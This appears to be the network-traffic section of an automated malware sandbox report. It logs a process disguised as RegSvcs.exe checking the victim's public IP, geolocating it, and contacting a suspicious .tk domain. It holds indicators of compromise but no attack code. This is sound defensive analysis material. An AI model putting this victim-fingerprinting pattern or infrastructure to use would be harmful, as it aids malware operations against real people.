Apr 8, 2024 13:59:34.963280916 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:35.004241943 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:56.581820011 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:56.581886053 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:56.581948042 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:56.586730003 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 14:00:06.031163931 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 14:00:06.031255007 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 14:00:06.031344891 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 14:00:06.033533096 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 14:00:22.180644035 CEST	80	49740	158.101.44.242	192.168.2.4
Apr 8, 2024 14:00:22.180752039 CEST	49740	80	192.168.2.4	158.101.44.242
Apr 8, 2024 14:00:33.344280958 CEST	80	49758	158.101.44.242	192.168.2.4
Apr 8, 2024 14:00:33.344404936 CEST	49758	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 13:59:12.479264975 CEST	50688	53	192.168.2.4	1.1.1.1
Apr 8, 2024 13:59:12.604512930 CEST	53	50688	1.1.1.1	192.168.2.4
Apr 8, 2024 13:59:13.948348045 CEST	56367	53	192.168.2.4	1.1.1.1
Apr 8, 2024 13:59:14.075366974 CEST	53	56367	1.1.1.1	192.168.2.4
Apr 8, 2024 13:59:24.549839020 CEST	56073	53	192.168.2.4	1.1.1.1
Apr 8, 2024 13:59:24.942414999 CEST	53	56073	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 8, 2024 13:59:12.479264975 CEST	192.168.2.4	1.1.1.1	0x14e1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:13.948348045 CEST	192.168.2.4	1.1.1.1	0x872d	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:24.549839020 CEST	192.168.2.4	1.1.1.1	0x33c0	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:12.604512930 CEST	1.1.1.1	192.168.2.4	0x14e1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:14.075366974 CEST	1.1.1.1	192.168.2.4	0x872d	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:14.075366974 CEST	1.1.1.1	192.168.2.4	0x872d	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:24.942414999 CEST	1.1.1.1	192.168.2.4	0x33c0	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 8, 2024 13:59:24.942414999 CEST	1.1.1.1	192.168.2.4	0x33c0	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:12.812274933 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:13.127237082 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:13 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:59:13.321785927 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:13.508291006 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:13 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:59:15.666697979 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:15.885596037 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:15 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:16.776511908 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:17.181565046 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:17.937311888 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:18.119434118 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:18 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:18.886874914 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:19.564827919 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:19 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:20.307406902 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:22.049896002 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:21 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:22.795017958 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:22.974997044 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:22 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	158.101.44.242	80	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:23.724900007 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:23.979584932 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:23 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:25.232907057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:25.412451029 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:25 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:59:25.415770054 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:25.595873117 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:25 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 13:59:26.232584000 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:26.412240982 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:26 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:27.166821003 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:27.347781897 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:27 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:28.090043068 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 13:59:28.344739914 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:28 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:29.356972933 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:29.675683022 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:29 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:30.422316074 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:30.639260054 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:30 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:31.387311935 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:31.569299936 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:31 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	158.101.44.242	80	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 13:59:32.324795961 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 13:59:32.504470110 CEST	276	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:32 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:15 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:15 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79456 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnComRlUv30JL1xY1TFur9JsyNdbLlIIeb6%2FbTBWNT40y5AjNzY0TZyRfbcs78Iw9%2Busq34gF7uBWKetzdDeRAM9AKrMEtq8e6GaIGR1SC%2BZR%2Fqjc%2BjOMfJO8HXwm8lZYKjNjACV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712171849fc495c-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:15 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
